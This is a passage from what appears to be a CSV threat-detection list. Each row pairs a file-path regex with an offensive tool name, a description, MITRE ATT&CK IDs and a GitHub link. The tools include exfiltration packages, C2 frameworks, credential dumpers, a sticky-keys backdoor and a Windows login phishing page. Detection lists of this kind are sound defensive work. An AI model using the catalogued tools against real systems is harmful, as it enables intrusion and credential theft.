Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/wifiPayload/client.py*",".{0,1000}\/wifiPayload\/client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/wifiPayload/server.py*",".{0,1000}\/wifiPayload\/server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/wifite -c *",".{0,1000}\/wifite\s\-c\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*/wifite2*",".{0,1000}\/wifite2.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*/wikipedia_fr.7z*",".{0,1000}\/wikipedia_fr\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/wikiZ/RedGuard*",".{0,1000}\/wikiZ\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/win/Tor/tor.exe*",".{0,1000}\/win\/Tor\/tor\.exe.{0,1000}","offensive_tool_keyword","Tor","Tor is a 
python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/Win7ElevateDll*",".{0,1000}\/Win7ElevateDll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/WinBruteLogon*",".{0,1000}\/WinBruteLogon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*/win-brute-logon*",".{0,1000}\/win\-brute\-logon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - 
T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*/WinBruteLogon.zip*",".{0,1000}\/WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/windapsearch.git*",".{0,1000}\/windapsearch\.git.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*/windapsearch.py*",".{0,1000}\/windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/windapsearch_*.txt*",".{0,1000}\/windapsearch_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/WindDef_WebInstall.hta*",".{0,1000}\/WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/windows/dcerpc*",".{0,1000}\/windows\/dcerpc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/windows_autologin.rb*",".{0,1000}\/windows_autologin\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Windows_MSKSSRV_LPE_CVE-2023-36802.git*",".{0,1000}\/Windows_MSKSSRV_LPE_CVE\-2023\-36802\.git.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*/windows_x64_admin.exe*",".{0,1000}\/windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows_x64_agent.exe*",".{0,1000}\/windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows_x86_admin.exe*",".{0,1000}\/windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows_x86_agent.exe*",".{0,1000}\/windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows-login-phish*",".{0,1000}\/windows\-login\-phish.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows machine login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*/windows-lpe-template*",".{0,1000}\/windows\-lpe\-template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Windows-Passwords.ps1*",".{0,1000}\/Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/windows-resources/hyperion*",".{0,1000}\/windows\-resources\/hyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/WindowsVault.cna*",".{0,1000}\/WindowsVault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/WindowsVault.h*",".{0,1000}\/WindowsVault\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/win-enum-resources*",".{0,1000}\/win\-enum\-resources.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/WINHELLO2hashcat.py*",".{0,1000}\/WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/WinPirate.bat*",".{0,1000}\/WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/WinPirate.git*",".{0,1000}\/WinPirate\.git.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/WinPwn*",".{0,1000}\/WinPwn.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/WinPwn.git*",".{0,1000}\/WinPwn\.git.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - 
TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/WinPwn_Repo*",".{0,1000}\/WinPwn_Repo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/WinPwnage*",".{0,1000}\/WinPwnage.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/winregistry.py**",".{0,1000}\/winregistry\.py.{0,1000}.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/winrm.cpp*",".{0,1000}\/winrm\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winrm.py*",".{0,1000}\/winrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/winrmdll*",".{0,1000}\/winrmdll.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winrm-reflective-dll/*",".{0,1000}\/winrm\-reflective\-dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winscp_dump.py*",".{0,1000}\/winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Winsocky.git*",".{0,1000}\/Winsocky\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*/winsos.exe*",".{0,1000}\/winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense 
